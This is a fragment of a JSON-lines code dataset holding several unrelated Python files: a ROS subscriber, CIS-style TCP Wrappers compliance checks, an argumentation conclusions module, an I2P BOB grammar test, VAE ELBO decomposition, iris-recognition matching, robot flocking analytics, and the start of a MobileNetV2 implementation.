1))\n#print(newele.draw_bottom())\n#print(newele.nav())\n","sub_path":"week-05/day-04/elevator/elevator_view.py","file_name":"elevator_view.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"511491581","text":"#!/usr/bin/env python3\n#coding: utf-8\n\nimport rospy\nfrom std_msgs.msg import String\nfrom nav_msgs.msg import Odometry\nfrom cmoon_msgs.msg import location\n\n\ndef callback(msg):\n rospy.loginfo('callback')\n ll=location()\n ll.location='living room'\n ll.x=1.0\n ll.y=2.0\n pub=rospy.Publisher('location',location,queue_size=10)\n pub.publish(ll)\n rospy.loginfo('location:{} x:{} y{}'.format(ll.location,ll.x,ll.y))\n\ndef main():\n rospy.init_node('test1')\n rospy.Subscriber('/odom',Odometry,callback)\n # pub=rospy.Publisher('location',location,queue_size=10)\n # ll=location()\n # ll.location='living room'\n # ll.x=1.0\n # ll.y=2.0\n # rate=rospy.Rate(1)\n # while not rospy.is_shutdown():\n # pub.publish(ll)\n # rospy.loginfo('location:{} x:{} y{}'.format(ll.location,ll.x,ll.y))\n # rate.sleep()\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n main()\n except 
rospy.ROSInterruptException:\n        rospy.loginfo(\"Keyboard interrupt.\")","sub_path":"src/remake/src/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"372108632","text":"import os\nimport source\n\n\n# --- 3.4.1 Ensure TCP Wrappers is installed (Scored) ---#\n\ndef check_tcp_wrappers_is_installed():\n    config = '3.4.1 Ensure TCP Wrappers is installed (Scored)'\n\n    command1 = 'rpm -q tcp_wrappers'\n    command2 = 'rpm -q tcp_wrappers-libs'\n    output = 'not installed'\n\n    print('checking \"' + config + '\" ..... ')\n\n    terminal_variable = os.popen(command1)\n    terminal_output1 = terminal_variable.read()\n\n    terminal_variable = os.popen(command2)\n    terminal_output2 = terminal_variable.read()\n\n    # non-compliant if either package reports 'not installed'\n    if output in terminal_output1 or output in terminal_output2:\n        source.return_function(False, config)\n    else:\n        source.return_function(True, config)\n\n\n# --- 3.4.3 Ensure /etc/hosts.deny is configured (Scored) ---- #\n\ndef check_etc_hosts_deny_is_configured():\n    config = '3.4.3 Ensure /etc/hosts.deny is configured (Scored)'\n    command = 'cat /etc/hosts.deny'\n    output = 'ALL: ALL'\n    source.output_isIn_terminal_output(config, command, output)\n\n\n# ---- 3.4.4 Ensure permissions on /etc/hosts.allow are configured (Scored) ---#\n\ndef check_permissions_on_etc_hosts_allow_isConfigured():\n    config = '3.4.4 Ensure permissions on /etc/hosts.allow are configured (Scored)'\n    command = 'stat /etc/hosts.allow'\n    output = 'Access:(0644/-rw-r--r--)Uid:(0/root)Gid:(0/root)'\n\n    print('checking \"' + config + '\" ..... ')\n    terminal_variable = os.popen(command)\n    terminal_output = terminal_variable.read().replace(' ', '')\n\n    if output in terminal_output:\n        source.return_function(True, config)\n    else:\n        source.return_function(False, config)\n\n\n# ---- 3.4.5 Ensure permissions on /etc/hosts.deny are configured (Scored) ---#\n\ndef check_permissions_on_etc_hosts_deny_isConfigured():\n    config = '3.4.5 Ensure permissions on /etc/hosts.deny are configured (Scored)'\n    command = 'stat /etc/hosts.deny'\n    output = 'Access:(0644/-rw-r--r--)Uid:(0/root)Gid:(0/root)'\n\n    print('checking \"' + config + '\" ..... 
')\n terminal_variable = os.popen(command)\n terminal_output = terminal_variable.read().replace(' ', '')\n\n if output in terminal_output:\n source.return_function(True, config)\n\n else:\n source.return_function(False, config)\n","sub_path":"networkConfiguration/tcpWrappers.py","file_name":"tcpWrappers.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"226834471","text":"\"\"\"\nconclusions.py\n\n* Copyright (c) 2006-2009, University of Colorado.\n* All rights reserved.\n*\n* Redistribution and use in source and binary forms, with or without\n* modification, are permitted provided that the following conditions are met:\n* * Redistributions of source code must retain the above copyright\n* notice, this list of conditions and the following disclaimer.\n* * Redistributions in binary form must reproduce the above copyright\n* notice, this list of conditions and the following disclaimer in the\n* documentation and/or other materials provided with the distribution.\n* * Neither the name of the University of Colorado nor the\n* names of its contributors may be used to endorse or promote products\n* derived from this software without specific prior written permission.\n*\n* THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY OF COLORADO ''AS IS'' AND ANY\n* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n* DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF COLORADO BE LIABLE FOR ANY\n* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n#import confidence\nimport samples\n\n__ALL_SAMPLES = 0\n\ncurState = 0\n\nconclusions = [\"no process\", ]\nspecial = {\"outlier\":__ALL_SAMPLES}\n \ndef reset():\n \"\"\"\n Resets the conclusion state for starting up a new set of samples.\n Call this in between each thingymajig\n \"\"\"\n global curState\n curState = 0\n\ndef getConclusions():\n \"\"\"\n this function returns the list of conclusions that the engine should argue about. All\n parameters should be pre-entered.\n \"\"\"\n \n #can't do this with a list comprehension. 
Sigh.\n result = []\n for conclusion in conclusions:\n if conclusion in special:\n result.extend(__fillParams(conclusion))\n else:\n result.append(Conclusion(conclusion))\n \n return result\n\n \ndef __fillParams(conclusion):\n \"\"\"\n fills in parameters for conclusions and then returns the appropriate list of conclusion objects \n based on the type ID passed in.\n \"\"\"\n \n #conclusions should never be passed here anymore unless they're special ones\n \n if special[conclusion] == __ALL_SAMPLES:\n return [Conclusion(conclusion, [sample]) for sample in samples.sampleList]\n\nclass Conclusion:\n \"\"\"\n Contains the symbol (name) of a specific instance of a conclusion plus the list of arguments\n applicable to this specific conclusion (like outlier x).\n \n Also represents the same thing but with arguments filled in (like outlier 2)\n \"\"\"\n def __init__(self, name, paramList=None):\n self.name = name\n self.paramList = paramList\n if paramList is not None and len(paramList) == 0:\n self.paramList = None\n \n def __eq__(self, other):\n if isinstance(other, Conclusion):\n return self.name == other.name and \\\n (self.paramList is None and other.paramList is None or \\\n (self.paramList is not None and other.paramList is not None and\n len(self.paramList) == len(other.paramList)))\n else:\n return False\n \n def __repr__(self):\n st = self.name.title()\n if self.paramList is not None:\n st += ': ' + ', '.join([str(param) for param in self.paramList]) #+ ')'\n return st\n \n def buildEnv(self, filledConc):\n \"\"\"\n builds an initial environment from this conclusion and a filled version of the\n same conclusion (passed as a parameter). Initial environment values are also\n included in the result. Environments are dictionaries.\n \"\"\"\n \n if self.paramList is None and filledConc.paramList is None:\n return samples.initEnv.copy()\n \n if self.paramList is None or \\\n filledConc.paramList is None or \\\n len(filledConc.paramList) != len(self.paramList):\n raise ValueError(\"Attempt to use a rule with incorrect number of conclusion parameters\")\n \n env = dict(zip(self.paramList, filledConc.paramList))\n \n env.update(samples.initEnv)\n \n #if self.name == 'representative sample' or self.name == 'outlier':\n # print self, env\n return env\n \n \n\n \n","sub_path":"src/calvin/reasoning/conclusions.py","file_name":"conclusions.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"323259197","text":"# Copyright (c) str4d \n# See COPYING for details.\n\nimport unittest\n\nfrom parsley import makeGrammar, ParseError\n\nfrom txi2p.grammar import bobGrammarSource\n\n\nbobGrammar = makeGrammar(bobGrammarSource, {})\n\ndef stringParserFromRule(grammar, rule):\n def parseString(s):\n return getattr(grammar(s), rule)()\n return parseString\n\n\nclass TestBOBGrammar(unittest.TestCase):\n def _test(self, rule, data, expected):\n parse = stringParserFromRule(bobGrammar, rule)\n result = parse(data)\n self.assertEqual(result, expected)\n\n def test_BOB_clear(self):\n self._test('BOB_clear', 'OK cleared\\n', (True, 'cleared'))\n self._test('BOB_clear', 'ERROR tunnel is active\\n', (False, 'tunnel is active'))\n\n def test_BOB_getdest(self):\n self._test('BOB_getdest', 'OK spam\\n', (True, 'spam'))\n\n def test_BOB_getkeys(self):\n self._test('BOB_getkeys', 'OK spameggs\\n', (True, 'spameggs'))\n\n def test_BOB_list(self):\n spam = {\n 'nickname': 'spam',\n 'starting': False,\n 'running': True,\n 'stopping': 
False,\n            'keys': True,\n            'quiet': False,\n            'inport': '12345',\n            'inhost': 'localhost',\n            'outport': '23456',\n            'outhost': 'localhost'\n        }\n        eggs = {\n            'nickname': 'eggs',\n            'starting': False,\n            'running': False,\n            'stopping': False,\n            'keys': True,\n            'quiet': False,\n            'inport': 'not_set',\n            'inhost': 'localhost',\n            'outport': 'not_set',\n            'outhost': 'localhost'\n        }\n\n        self._test('BOB_list', 'OK Listing done\\n', (True, 'Listing done', []))\n        self._test('BOB_list', 'DATA NICKNAME: spam STARTING: false RUNNING: true STOPPING: false KEYS: true QUIET: false INPORT: 12345 INHOST: localhost OUTPORT: 23456 OUTHOST: localhost\\nDATA NICKNAME: eggs STARTING: false RUNNING: false STOPPING: false KEYS: true QUIET: false INPORT: not_set INHOST: localhost OUTPORT: not_set OUTHOST: localhost\\nOK Listing done\\n', (True, 'Listing done', [spam, eggs]))\n        self._test('BOB_list', 'ERROR ni!\\n', (False, 'ni!', []))\n","sub_path":"txi2p/test/test_grammar.py","file_name":"test_grammar.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"376555368","text":"import torch\nimport math\n\nfrom torch.autograd import Variable\nfrom tqdm import tqdm\n\n\ndef estimate_entropies(qz_samples, qz_params, q_dist):\n    \"\"\"Computes the term:\n        E_{p(x)} E_{q(z|x)} [-log q(z)]\n    and\n        E_{p(x)} E_{q(z_j|x)} [-log q(z_j)]\n    where q(z) = 1/N sum_n=1^N q(z|x_n).\n\n    Assumes samples are from q(z|x) for *all* x in the dataset.\n    Assumes that q(z|x) is factorial ie. q(z|x) = prod_j q(z_j|x).\n\n    Computes numerically stable NLL:\n        - log q(z) = log N - logsumexp_n=1^N log q(z|x_n)\n\n    Inputs:\n    -------\n        qz_samples (K, S) Variable\n        qz_params (N, K, nparams) Variable\n    \"\"\"\n\n    # Only take a sample subset of the samples\n    qz_samples = qz_samples.index_select(1, Variable(torch.randperm(qz_samples.size(1))[:10000].cuda()))\n\n    K, S = qz_samples.size()\n    N, _, nparams = qz_params.size()\n    assert(nparams == q_dist.nparams)\n    assert(K == qz_params.size(1))\n\n    marginal_entropies = torch.zeros(K).cuda()\n    joint_entropy = torch.zeros(1).cuda()\n\n    pbar = tqdm(total=S)\n    k = 0\n    while k < S:\n        batch_size = min(10, S - k)\n        logqz_i = q_dist.log_density(\n            qz_samples.view(1, K, S).expand(N, K, S)[:, :, k:k + batch_size],\n            qz_params.view(N, K, 1, nparams).expand(N, K, S, nparams)[:, :, k:k + batch_size])\n        k += batch_size\n\n        # computes - log q(z_i) summed over minibatch\n        marginal_entropies += (math.log(N) - torch.logsumexp(logqz_i, dim=0, keepdim=False).data).sum(1)\n        # computes - log q(z) summed over minibatch\n        logqz = logqz_i.sum(1)  # (N, S)\n        joint_entropy += (math.log(N) - torch.logsumexp(logqz, dim=0, keepdim=False).data).sum(0)\n        pbar.update(batch_size)\n    pbar.close()\n\n    marginal_entropies /= S\n    joint_entropy /= S\n\n    return marginal_entropies, joint_entropy\n\n\ndef elbo_decomposition(vae, dataset_loader):\n    # the model is expected to expose z_dim, q_dist, x_dist, encoder and decoder\n    N = len(dataset_loader.dataset)\n    K = vae.z_dim\n    nparams = vae.q_dist.nparams\n    S = 1\n\n    print('Computing q(z|x) distributions.')\n    # compute the marginal q(z_j|x_n) distributions\n    qz_params = torch.Tensor(N, K, nparams)\n\n    n = 0\n    logpx = 0\n\n    for xs in dataset_loader:\n        batch_size = xs.size(0)\n        xs = Variable(xs.view(batch_size, -1, 64, 64).cuda(), volatile=True)\n        z_params = vae.encoder.forward(xs).view(batch_size, K, nparams)\n        qz_params[n:n + batch_size] = z_params.data\n        n += batch_size\n\n        # estimate reconstruction term\n        for _ in range(S):\n            z = vae.q_dist.sample(params=z_params)\n            x_params = vae.decoder.forward(z)\n            logpx += vae.x_dist.log_density(xs, params=x_params).view(batch_size, -1).data.sum()\n\n    logpx = logpx / (N 
* S)\n\n qz_params = Variable(qz_params.cuda(), volatile=True)\n\n print('Sampling from q(z).')\n # sample S times from each marginal q(z_j|x_n)\n qz_params_expanded = qz_params.view(N, K, 1, nparams).expand(N, K, S, nparams)\n qz_samples = vae.q_dist.sample(params=qz_params_expanded)\n qz_samples = qz_samples.transpose(0, 1).contiguous().view(K, N * S)\n\n print('Estimating entropies.')\n marginal_entropies, joint_entropy = estimate_entropies(qz_samples, qz_params, vae.q_dist)\n\n if hasattr(vae.q_dist, 'NLL'):\n nlogqz_condx = vae.q_dist.NLL(qz_params).mean(0)\n else:\n nlogqz_condx = - vae.q_dist.log_density(qz_samples,\n qz_params_expanded.transpose(0, 1).contiguous().view(K, N * S)).mean(1)\n\n if hasattr(vae.prior_dist, 'NLL'):\n pz_params = vae._get_prior_params(N * K).contiguous().view(N, K, -1)\n nlogpz = vae.prior_dist.NLL(pz_params, qz_params).mean(0)\n else:\n nlogpz = - vae.prior_dist.log_density(qz_samples.transpose(0, 1)).mean(0)\n\n # nlogqz_condx, nlogpz = analytical_NLL(qz_params, vae.q_dist, vae.prior_dist)\n nlogqz_condx = nlogqz_condx.data\n nlogpz = nlogpz.data\n\n # Independence term\n # KL(q(z)||prod_j q(z_j)) = log q(z) - sum_j log q(z_j)\n dependence = (- joint_entropy + marginal_entropies.sum())[0]\n\n # Information term\n # KL(q(z|x)||q(z)) = log q(z|x) - log q(z)\n information = (- nlogqz_condx.sum() + joint_entropy)[0]\n\n # Dimension-wise KL term\n # sum_j KL(q(z_j)||p(z_j)) = sum_j (log q(z_j) - log p(z_j))\n dimwise_kl = (- marginal_entropies + nlogpz).sum()\n\n # Compute sum of terms analytically\n # KL(q(z|x)||p(z)) = log q(z|x) - log p(z)\n analytical_cond_kl = (- nlogqz_condx + nlogpz).sum()\n\n print('Dependence: {}'.format(dependence))\n print('Information: {}'.format(information))\n print('Dimension-wise KL: {}'.format(dimwise_kl))\n print('Analytical E_p(x)[ KL(q(z|x)||p(z)) ]: {}'.format(analytical_cond_kl))\n print('Estimated ELBO: {}'.format(logpx - analytical_cond_kl))\n\n return logpx, dependence, information, dimwise_kl, analytical_cond_kl, marginal_entropies, joint_entropy\n\n\nif __name__ == '__main__':\n\n vae, dataset_loader = load_model_and_dataset(args.checkpt)\n logpx, dependence, information, dimwise_kl, analytical_cond_kl, marginal_entropies, joint_entropy = \\\n elbo_decomposition(vae, dataset_loader)\n torch.save({\n 'logpx': logpx,\n 'dependence': dependence,\n 'information': information,\n 'dimwise_kl': dimwise_kl,\n 'analytical_cond_kl': analytical_cond_kl,\n 'marginal_entropies': marginal_entropies,\n 'joint_entropy': joint_entropy\n }, os.path.join(args.save, 'elbo_decomposition.pth'))\n","sub_path":"elbo_evaluation.py","file_name":"elbo_evaluation.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"605747860","text":"#!usr/bin/python\nimport sys\nfrom os import path\nimport numpy as np\n\nfrom convolver import EyeCoord, GaborFunc, ImgToBinSpectrum, HammingDist, FitToRange255, LogGaborFunc\nfrom PIL import Image\nfrom multiprocessing import Pool\n\nimport cProfile\n\ndef get_data_dict(data_path, imgs_path):\n\tres_dict = dict()\n\twith open(data_path, 'r') as data_file:\n\t\ti = 0\n\t\tk = 0\n\t\tfor line in data_file:\n\t\t\tline_items = line.split()\n\t\t\timg_name = line_items[0]\n\t\t\tk += 1\n\t\t\tif path.exists(imgs_path + '/' + img_name):\n\t\t\t\ti += 1\n\t\t\t\tres_dict[img_name] = EyeCoord(\tx1=np.array([int(i) for i in 
line_items[6:8]]),\n\t\t\t\t\t\t\t\t\t\t\t\tr1=int(line_items[8]),\n\t\t\t\t\t\t\t\t\t\t\t\tx2=np.array([int(i) for i in line_items[11:13]]),\n\t\t\t\t\t\t\t\t\t\t\t\tr2=int(line_items[13]))\n\tprint(i, k)\n\treturn res_dict\n\n\ndef is_test_img(name):\n#\treturn 1\n\treturn int(name[:4]) in range(2001, 2151)\n\t#return 'R' in name and int(name[:4]) in range(2001, 2151)\n\t#return 'L' in name and int(name[:4]) in range(2001, 2151)\n\n\ndef ImageSpectrum(arg_tuple):\n\teye_name, eye_coord, imgs_path = arg_tuple\n\tspectr_size = (256, 64)\n\tsigma = 17\n\tT = 8\n\timg_path = imgs_path + '/' + eye_name\n\treturn ImgToBinSpectrum(img_path, eye_coord, spectr_size, LogGaborFunc, S=1/sigma, W=1/T)\n\t#return ImgToBinSpectrum(img_path, eye_coord, spectr_size, GaborFunc, S=1/sigma, W=1/T)\n\ndef HammDistMatrix(imgs_path, imgs_dict):\n\tdist_same = []\n\tdist_diff = []\n\t\n\timg_to_idx = dict()\n\tidx_to_img = dict()\n\tpool = Pool(4)\n\n\tfor idx, (eye_name, _) in enumerate(imgs_dict.items()):\n\t\timg_to_idx[eye_name] = idx\n\t\tidx_to_img[idx] = eye_name\n\n\targ_tuples = list(zip(imgs_dict.keys(), imgs_dict.values(), [imgs_path] * len(imgs_dict)))\n\n\tspectrums = pool.map(ImageSpectrum, arg_tuples)\n\n\tassert len(imgs_dict) == len(spectrums)\n\timg_to_spectrum = dict(zip(imgs_dict.keys(), spectrums))\n\n\tfor x in range(len(imgs_dict)):\n\t\tspectr_x = img_to_spectrum[idx_to_img[x]]\n\t\tfor y in range(x + 1, len(imgs_dict)):\n\t\t\tspectr_y = img_to_spectrum[idx_to_img[y]]\n\n\t\t\tdist = HammingDist(spectr_x, spectr_y)\n\t\t\tprint(dist)\n\t\t\t#Image.fromarray(FitToRange255(spectr_x).T, 'L').save('./tmp/spectr_' + idx_to_img[x])\n\t\t\tif idx_to_img[y][:5] == idx_to_img[x][:5]:\n\t\t\t\tdist_same.append(dist)\n\t\t\t\t#print('same', idx_to_img[y], idx_to_img[x], '->', dist)\n\t\t\telse:\n\t\t\t\tdist_diff.append(dist)\n\t\t\t\t#print('diff', idx_to_img[y], idx_to_img[x], '->', dist)\n\n\treturn dist_same, dist_diff\n\n\nif __name__ == '__main__':\n\tif len(sys.argv) < 3:\n\t\tprint('Not enough args')\n\t\tsys.exit(1)\n\n\n#\ttry:\n\n\tdata_path = sys.argv[1]\n\timgs_path = sys.argv[2]\n\n\tdata_dict = get_data_dict(data_path, imgs_path)\n\tprint(len(data_dict))\n\ttest_set = dict((key,value) for key, value in data_dict.items() if is_test_img(key))\n\tprint(len(test_set))\n\n\t#cProfile.run('HammDistMatrix(imgs_path, dict(list(test_set.items())[:50]))')\n\tsame, diff = HammDistMatrix(imgs_path, test_set)\n\tf = open('same.txt', 'w')\n\tf.write(' '.join([str(int(j)) for j in same]))\n\tf.close()\n\tf = open('diff.txt', 'w')\n\tf.write(' '.join([str(i) for i in list(diff)]))\n\tf.close()\n\n#\texcept Exception as e:\n#\t\tprint(e)\n#\t\tsys.exit(1)","sub_path":"img_data.py","file_name":"img_data.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"205930412","text":"import pickle\nfrom helper.Reynolds import *\nfrom helper.MRSAnalytics import *\nfrom helper.Plotter import *\nfrom helper.Trainer import *\nfrom helper.DataGenerator import *\nfrom torch.distributions import *\nfrom mrsgym.Util import *\nimport os\nfrom matplotlib import pyplot as plt\n\n\n\ndef main():\n\t# Parameters\n\tN = 12\n\tD = 6\n\tK = 1\n\tCOMM_RANGE = 2.5\n\tdatapoints = 1000\n\tepisode_length = 200\n\theadless = True\n\tleader = True\n\t# File Paths\n\tdir_path = \"data\"\n\tevaldata_path = os.path.join(dir_path, \"%s_data.pt\")\n\ttry:\n\t\tos.mkdir(dir_path)\n\texcept FileExistsError:\n\t\tpass\n\t# Initialise 
Models\n\treynolds = Reynolds(N, D, 1, 3)\n\tmodels = {\"reynolds\": reynolds, \"random\": RandomController(OUT_DIM=3)} # we will compare reynolds flocking to a random model\n\t# Create Environment\n\tz = Uniform(low=2.0*torch.ones(N,1), high=5.0*torch.ones(N,1))\n\txy_normal = Normal(torch.zeros(N,2), 1.0)\n\tdist = CombinedDistribution([xy_normal, z], mixer='cat', dim=1) # create custom starting state distribution\n\tenv = gym.make('mrs-v0', state_fn=state_fn, update_fn=update_fn, N_AGENTS=N, START_POS=dist, K_HOPS=1, COMM_RANGE=COMM_RANGE, ACTION_TYPE='set_target_vel', HEADLESS=headless)\n\tstartpos = [env.generate_start_pos() for _ in range(int(datapoints/episode_length*2))]\n\tenv.START_POS = StartPosGenerator(startpos) # use the same starting state for each model\n\t# Generate and Analyse Data\n\tanalysers = {}\n\tfor name, model in models.items():\n\t\tprint(name)\n\t\tdata = Trainer(K=K)\n\t\tis_data_loaded = data.load_trainer(path=evaldata_path % name) # load simulation data if it exists\n\t\tif not is_data_loaded: # generate data if it does not exist\n\t\t\tdata.save_trainer_onexit(path=evaldata_path % name)\n\t\t\tsimulate(env=env, model=model, trainer=data, datapoints=datapoints, episode_length=episode_length, leader=leader)\n\t\tanalysers[name] = MRSAnalytics(data) # compute flocking metrics (separation, cohesion, leader dist)\n\t\tanalysers[name].name = name\n\t# Draw Plots\n\tplot_separation(*analysers.values())\n\tplot_cohesion(*analysers.values())\n\tplot_leader_dist(*analysers.values())\n\t# Show\n\tshow_plots()\n\n\n\ndef state_fn(quad):\n\treturn torch.cat([quad.get_pos(), quad.get_vel()])\n\ndef update_fn(env, action, **kwargs):\n\tfor i, agent in enumerate(env.agents):\n\t\tenv.add_line(start=[0.,0.,0.], end=action[i,:], parent=agent, name=\"line_%d\" % i, colour=[0.,0.,1.])\n\ndef simulate(env, model, leader=False, **kwargs):\n\tif leader:\n\t\tleader_action_policy = RandomAction()\n\t\taction_fn = leader_action_policy.action_fn\n\t\tenvironment = env.get_env()\n\t\tleader_agent = environment.agents[0]\n\t\tenvironment.set_colour(leader_agent, [1.,0.,0.])\n\telse:\n\t\taction_fn = lambda action, state: action\n\tenv.START_POS.reset()\n\tdata = generate_mrs(env, model=model, action_fn=action_fn, **kwargs)\n\treturn data\n\ndef plot_separation(*analysers):\n\tseparations = [analyser.separation().permute(0,2,1).reshape(analyser.N*analyser.num_episodes, analyser.episode_length) for analyser in analysers]\n\tnames = [analyser.name for analyser in analysers]\n\tplot_time_distribution(data=separations, labels=names, xlabel=\"Time Step\", ylabel=\"Separation from Nearest Neighbor\", title=\"\", ignorenan=True)\n\tfor name, separation in zip(names, separations):\n\t\tsep = separation.reshape(-1)\n\t\tmean = mean_ignorenan(sep.unsqueeze(1))[0]\n\t\tmedian = median_ignorenan(sep.unsqueeze(1))[0]\n\t\tstd = std_ignorenan(sep.unsqueeze(1))[0]\n\t\tprint(\"%s Separation: median=%g, mean=%g, std=%g\" % (name, median, mean, std))\n\ndef plot_cohesion(*analysers):\n\tcohesions = [analyser.cohesion() for analyser in analysers]\n\tnames = [analyser.name for analyser in analysers]\n\tplot_time_distribution(data=cohesions, labels=names, xlabel=\"Time Step\", ylabel=\"Diameter of Smallest Sphere that Contains all Agents\", title=\"\", ignorenan=True)\n\tfor name, cohesion in zip(names, cohesions):\n\t\tcoh = cohesion.reshape(-1)\n\t\tmean = mean_ignorenan(coh.unsqueeze(1))[0]\n\t\tmedian = median_ignorenan(coh.unsqueeze(1))[0]\n\t\tstd = std_ignorenan(coh.unsqueeze(1))[0]\n\t\tprint(\"%s 
Cohesion: median=%g, mean=%g, std=%g\" % (name, median, mean, std))\n\ndef plot_leader_dist(*analysers):\n\tdists = [analyser.dist_to_leader() for analyser in analysers]\n\tnames = [analyser.name for analyser in analysers]\n\tplot_time_distribution(data=dists, labels=names, xlabel=\"Time Step\", ylabel=\"Distance from the Center of the Swarm to the Leader\", title=\"\", ignorenan=True)\n\tfor name, dist in zip(names, dists):\n\t\tleader_dist = dist.reshape(-1)\n\t\tmean = mean_ignorenan(leader_dist.unsqueeze(1))[0]\n\t\tmedian = median_ignorenan(leader_dist.unsqueeze(1))[0]\n\t\tstd = std_ignorenan(leader_dist.unsqueeze(1))[0]\n\t\tprint(\"%s Leader Dist: median=%g, mean=%g, std=%g\" % (name, median, mean, std))\n\ndef loss_fn(output, target):\n\tloss = torch.nn.MSELoss()(output, target.double())\n\tloss_dict = {\"Loss\": loss}\n\treturn loss_dict\n\n# Generates an off-policy random action (used for creating a leader)\nclass RandomAction:\n\n\tdef __init__(self):\n\t\ttorch.manual_seed(0)\n\t\tself.target_vel = torch.zeros(3)\n\t\tself.sigma = 0.05\n\t\tself.maxspeed = 1.0\n\t\tself.dist = Normal(self.target_vel, self.sigma)\n\n\tdef action_fn(self, action, state):\n\t\t# Update target_vel\n\t\tself.dist = Normal(self.target_vel, self.sigma)\n\t\tself.target_vel = self.dist.sample()\n\t\tmag = self.target_vel.norm()\n\t\tself.target_vel *= self.maxspeed / max(mag, self.maxspeed)\n\t\t# Set Leader Velocity\n\t\taction[0,:] = self.target_vel\n\t\treturn action\n\n# Stores the starting states in simulation so they can be reused with other models for consistency\nclass StartPosGenerator:\n\n\tdef __init__(self, pos_list):\n\t\tself.pos_list = pos_list\n\t\tself.i = 0\n\n\tdef sample(self):\n\t\tstartpos = self.pos_list[self.i]\n\t\tself.i += 1\n\t\treturn startpos\n\n\tdef reset(self):\n\t\tself.i = 0\n\n# Random model\nclass RandomController:\n\n\tdef __init__(self, OUT_DIM):\n\t\tself.OUT_DIM = OUT_DIM\n\n\tdef forward(self, A, X):\n\t\tbatch, N, D, K = X.shape\n\t\treturn torch.randn(batch, N, self.OUT_DIM)\n\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"examples/simulating_data/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"249747793","text":"\"\"\"MobileNet v2 models for Keras.\n# Reference\n- [Inverted Residuals and Linear Bottlenecks Mobile Networks for\n Classification, Detection and Segmentation]\n (https://arxiv.org/abs/1801.04381)\n\"\"\"\n\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Conv2D, GlobalAveragePooling2D, Dropout, Flatten\nfrom keras.layers import Activation, BatchNormalization, add, Reshape, Dense\nfrom keras.applications.mobilenet import relu6, DepthwiseConv2D\nfrom keras.utils.vis_utils import plot_model\nfrom keras.applications import mobilenet\n\nfrom keras import backend as K\n\n\ndef _conv_block(inputs, filters, kernel, strides):\n \"\"\"Convolution Block\n This function defines a 2D convolution operation with BN and relu6.\n # Arguments\n inputs: Tensor, input tensor of conv layer.\n filters: Integer, the dimensionality of the output space.\n kernel: An integer or tuple/list of 2 integers, specifying the\n width and height of the 2D convolution window.\n strides: An integer or tuple/list of 2 integers,\n specifying the strides of the convolution along the width and height.\n Can be a single integer to specify the same value for\n all spatial dimensions.\n # Returns\n Output tensor.\n 
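# Example (illustrative sketch, not part of the original code)\n        x = _conv_block(inputs, 32, (3, 3), strides=(2, 2))\n    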
\"\"\"\n\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n\n x = Conv2D(filters, kernel, padding='same', strides=strides)(inputs)\n x = BatchNormalization(axis=channel_axis)(x)\n return Activation(relu6)(x)\n\n\ndef _bottleneck(inputs, filters, kernel, t, s, r=False):\n \"\"\"Bottleneck\n This function defines a basic bottleneck structure.\n # Arguments\n inputs: Tensor, input tensor of conv layer.\n filters: Integer, the dimensionality of the output space.\n kernel: An integer or tuple/list of 2 integers, specifying the\n width and height of the 2D convolution window.\n t: Integer, expansion factor.\n t is always applied to the input size.\n s: An integer or tuple/list of 2 integers,specifying the strides\n of the convolution along the width and height.Can be a single\n integer to specify the same value for all spatial dimensions.\n r: Boolean, Whether to use the residuals.\n # Returns\n Output tensor.\n \"\"\"\n\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n tchannel = K.int_shape(inputs)[channel_axis] * t\n\n x = _conv_block(inputs, tchannel, (1, 1), (1, 1))\n\n x = DepthwiseConv2D(kernel, strides=(s, s), depth_multiplier=1, padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n x = Activation(relu6)(x)\n\n x = Conv2D(filters, (1, 1), strides=(1, 1), padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n\n if r:\n x = add([x, inputs])\n return x\n\n\ndef _inverted_residual_block(inputs, filters, kernel, t, strides, n):\n \"\"\"Inverted Residual Block\n This function defines a sequence of 1 or more identical layers.\n # Arguments\n inputs: Tensor, input tensor of conv layer.\n filters: Integer, the dimensionality of the output space.\n kernel: An integer or tuple/list of 2 integers, specifying the\n width and height of the 2D convolution window.\n t: Integer, expansion factor.\n t is always applied to the input size.\n s: An integer or tuple/list of 2 integers,specifying the strides\n of the convolution along the width and height.Can be a single\n integer to 